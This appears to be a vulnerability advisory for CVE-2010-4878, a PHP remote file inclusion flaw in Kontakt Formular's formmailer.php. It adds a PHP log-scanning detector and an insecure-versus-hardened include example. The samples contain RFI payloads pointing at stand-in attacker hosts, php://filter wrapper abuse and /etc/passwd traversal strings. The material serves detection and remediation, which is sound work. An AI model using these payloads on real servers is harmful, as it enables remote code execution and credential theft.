CVE-2010-4878 in Kontakt Formular
Summary
by MITRE
PHP remote file inclusion vulnerability in formmailer.php in Kontakt Formular 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the script_pfad parameter.
Analysis
by VulDB Data Team • 09/16/2025
CVE-2010-4878 is a remote file inclusion (RFI) flaw in Kontakt Formular 1.1, a PHP contact-form script ("Kontakt Formular" is German for "contact form"). The bug sits in formmailer.php: the value of the script_pfad request parameter ("script path") is used, without validation, to build the path handed to a PHP include, so an attacker can supply a URL such as http://attacker.example/shell.txt and have the server fetch and execute that file. Remote inclusion only succeeds where PHP permits URL wrappers in include statements (allow_url_include=On on PHP 5.2 and later, or allow_url_fopen=On on releases before 5.2), but an unvalidated include path remains a local file inclusion vector even when those settings are off, so the flaw should not be treated as harmless on a hardened php.ini.
The weakness is catalogued as CWE-98, "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')"; its root cause is improper input validation (CWE-20). The script accepts script_pfad from the request and passes it to the include machinery without restricting it to an expected directory or set of files, so the attacker decides which code PHP parses and runs, with the privileges of the web server process. That makes the flaw a direct remote code execution vector: no memory corruption or second-stage trick is needed, only an HTTP request to a reachable server and a file the attacker can host.
The operational impact goes beyond a single injected script. Once code runs as the web server user, an attacker can drop a web shell for persistent access, read configuration files and database credentials, alter or deface site content, or pivot into the surrounding network. Exploitation is unauthenticated and carried over ordinary HTTP, so any Internet-facing deployment of the vulnerable script is exposed. In ATT&CK terms, the initial access is T1190 "Exploit Public-Facing Application" and the backdoor typically left behind is T1505.003 "Server Software Component: Web Shell"; the code execution itself falls under the parent technique T1059 "Command and Scripting Interpreter", since ATT&CK defines no PHP-specific sub-technique (T1059.007 covers JavaScript, not PHP).
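Detection for the exploitation pattern above, as an added example that is not part of the VulDB advisory or the Kontakt Formular project: a PHP 8 command-line script that scans web-server access-log lines for script_pfad values carrying a URL scheme, a PHP stream wrapper, or directory traversal, so it catches local-inclusion probing as well as the remote inclusion the CVE describes. The log lines, client addresses, hosts and file names are constructed for the example; only the names formmailer.php and script_pfad come from the advisory.

```php
<?php
declare(strict_types=1);

// Added detection example for CVE-2010-4878; not from the advisory or vendor.
// Constructed combined-log-format lines: client IPs, hosts and file names are
// made up; only formmailer.php and script_pfad come from the advisory.
const SAMPLE_LOG = <<<'LOG'
203.0.113.7 - - [16/Sep/2025:10:01:02 +0000] "GET /kontakt/formmailer.php?script_pfad=./inc/ HTTP/1.1" 200 512
203.0.113.8 - - [16/Sep/2025:10:01:05 +0000] "GET /kontakt/formmailer.php?script_pfad=http://198.51.100.9/shell.txt? HTTP/1.1" 200 131
203.0.113.9 - - [16/Sep/2025:10:01:09 +0000] "GET /kontakt/formmailer.php?script_pfad=hTtP%3A%2F%2F198.51.100.9%2Fs.txt%3F HTTP/1.1" 200 131
203.0.113.10 - - [16/Sep/2025:10:01:12 +0000] "GET /kontakt/formmailer.php?script_pfad=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 900
203.0.113.11 - - [16/Sep/2025:10:01:15 +0000] "GET /kontakt/formmailer.php?script_pfad=../../../../etc/ HTTP/1.1" 500 0
203.0.113.12 - - [16/Sep/2025:10:01:20 +0000] "GET /kontakt/index.php HTTP/1.1" 200 2048
LOG;

// Schemes and PHP stream wrappers whose presence in an include path means a
// remote fetch or wrapper abuse rather than a plain local file.
const SUSPICIOUS_SCHEMES = ['http', 'https', 'ftp', 'ftps', 'php', 'data', 'expect', 'phar', 'zip', 'compress.zlib'];

/** Pull the request target (path plus query) out of a combined-log line, or null. */
function extract_request_target(string $line): ?string
{
    return preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m) ? $m[1] : null;
}

/**
 * Classify the script_pfad value of one request target.
 * Returns 'none' (parameter absent), 'benign', 'scheme' (URL scheme or PHP
 * wrapper, i.e. RFI or wrapper abuse) or 'traversal' (LFI probing).
 * The value is percent-decoded a second time to catch double-encoded probes
 * and lower-cased because PHP matches wrapper names case-insensitively.
 */
function classify_script_pfad(string $target): string
{
    $q = strpos($target, '?');
    if ($q === false) {
        return 'none';
    }
    parse_str(substr($target, $q + 1), $params);          // first percent-decode
    if (!isset($params['script_pfad']) || !is_string($params['script_pfad'])) {
        return 'none';
    }
    $value = strtolower(rawurldecode($params['script_pfad']));   // second pass
    if (preg_match('#^([a-z][a-z0-9+.\-]*):(?://)?#', $value, $m)
        && in_array($m[1], SUSPICIOUS_SCHEMES, true)) {
        return 'scheme';
    }
    if (str_contains($value, '../') || str_contains($value, '..\\') || str_starts_with($value, '/')) {
        return 'traversal';
    }
    return 'benign';
}

/** Scan a log blob; returns [client_ip => verdict] for suspicious requests only. */
function detect_rfi_attempts(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $target = extract_request_target($line);
        if ($target === null) {
            continue;
        }
        $verdict = classify_script_pfad($target);
        if ($verdict === 'scheme' || $verdict === 'traversal') {
            $hits[strtok($line, ' ')] = $verdict;   // first token is the client IP
        }
    }
    return $hits;
}

// Stand-alone run: php detect_rfi.php
if (PHP_SAPI === 'cli') {
    foreach (detect_rfi_attempts(SAMPLE_LOG) as $ip => $verdict) {
        printf("%-14s %s\n", $ip, $verdict);
    }
}
```

On the constructed sample the script reports 203.0.113.8, 203.0.113.9 and 203.0.113.10 as `scheme` and 203.0.113.11 as `traversal`; the benign `./inc/` request and the unrelated index.php hit are ignored. The mixed-case, percent-encoded third line is the reason for the case folding and the second decode: a filter that looks only for the literal string `http://` misses it.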
Mitigation has an immediate part and a structural part. Immediately: upgrade to a release in which script_pfad no longer reaches an include statement, if the vendor ships one; otherwise remove formmailer.php or patch it locally. The correct code-level fix is not to filter characters out of script_pfad but to stop treating it as a path at all: hard-code the include directory, accept at most a file name checked against an allowlist, and resolve the result with realpath() plus a containment check against that directory. At the platform level, set allow_url_include=Off (and allow_url_fopen=Off where nothing needs it), confine PHP with open_basedir to the application tree, and run the interpreter as an unprivileged user so that a successful inclusion cannot write outside the web root. A web application firewall or intrusion detection system can flag script_pfad values that carry a URL scheme or traversal sequences, but that is defence in depth, not the fix. The flaw is a textbook case of the input-validation and least-privilege guidance in the OWASP Top Ten and the NIST Cybersecurity Framework.
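The include pattern described in the analysis above and the allowlist-plus-realpath() hardening recommended in this section, as an added PHP example. It is not the original formmailer.php source, which is not reproduced on this page; the function names, the helper-script directory and the allow-listed file names are assumptions made for the illustration. Both functions return the path that would be handed to include() rather than calling it, so the script runs offline under the php CLI without fetching or executing anything.

```php
<?php
declare(strict_types=1);

// Added illustration for CVE-2010-4878; not the original formmailer.php code.
// Directory holding the form's helper scripts. A real deployment would use
// __DIR__ . '/inc'; a temp dir keeps this stand-alone demo out of the web root.
define('SCRIPT_DIR', sys_get_temp_dir() . '/kontakt_formular_inc');

// Helper files the form may load (assumed names). Anything else is refused.
const ALLOWED_SCRIPTS = ['formmailer_config.php', 'formmailer_lang_de.php'];

/**
 * Vulnerable pattern (assumed shape of the 1.1 code): the request parameter is
 * the include prefix. With allow_url_include=On (allow_url_fopen=On before
 * PHP 5.2) a value such as "http://attacker.example/shell.txt?" makes PHP fetch
 * and run remote code; the trailing "?" turns the appended file name into a
 * harmless query string on the attacker's server. With URL wrappers off,
 * "../../etc/" or "php://filter/..." still yield local file inclusion.
 */
function insecure_include_path(string $script_pfad): string
{
    return $script_pfad . 'formmailer_config.php';
}

/**
 * Hardened form: the parameter is a file name, never a path. Keep only the
 * base name, require it to be allow-listed, resolve it with realpath() and
 * confirm it sits directly inside SCRIPT_DIR. Returns null on any failure.
 */
function secure_include_path(string $requested): ?string
{
    $name = basename($requested);             // drops directories and URL schemes
    if (!in_array($name, ALLOWED_SCRIPTS, true)) {
        return null;
    }
    $base = realpath(SCRIPT_DIR);
    $full = realpath(SCRIPT_DIR . '/' . $name);
    if ($base === false || $full === false) {
        return null;                          // directory or file does not exist
    }
    if (dirname($full) !== $base) {           // containment after symlink resolution
        return null;
    }
    return $full;
}

// Stand-alone demo with constructed inputs: php include_hardening.php
if (PHP_SAPI === 'cli') {
    if (!is_dir(SCRIPT_DIR)) {
        mkdir(SCRIPT_DIR, 0700, true);
    }
    foreach (ALLOWED_SCRIPTS as $f) {         // placeholder helpers so realpath() succeeds
        file_put_contents(SCRIPT_DIR . '/' . $f, "<?php\n// placeholder\n");
    }

    $inputs = [
        './inc/',                                           // benign under the old contract
        'formmailer_lang_de.php',                           // benign under the new contract
        'http://attacker.example/shell.txt?',               // classic RFI payload
        'http://attacker.example/formmailer_lang_de.php',   // URL part is discarded
        '../../../../etc/passwd',                           // traversal / LFI attempt
        'php://filter/convert.base64-encode/resource=',     // wrapper abuse
    ];
    foreach ($inputs as $in) {
        printf("input:    %s\ninsecure: %s\nsecure:   %s\n\n",
            $in, insecure_include_path($in), secure_include_path($in) ?? 'REJECTED');
    }
}
```

The insecure function happily yields `http://attacker.example/shell.txt?formmailer_config.php`, which is exactly the string PHP would fetch and execute when URL includes are enabled. The hardened function accepts only the two allow-listed names and always resolves them under SCRIPT_DIR; note that the URL-prefixed fourth input is reduced to its base name and resolved locally, so even a parameter that still looks like an attack cannot reach a remote host.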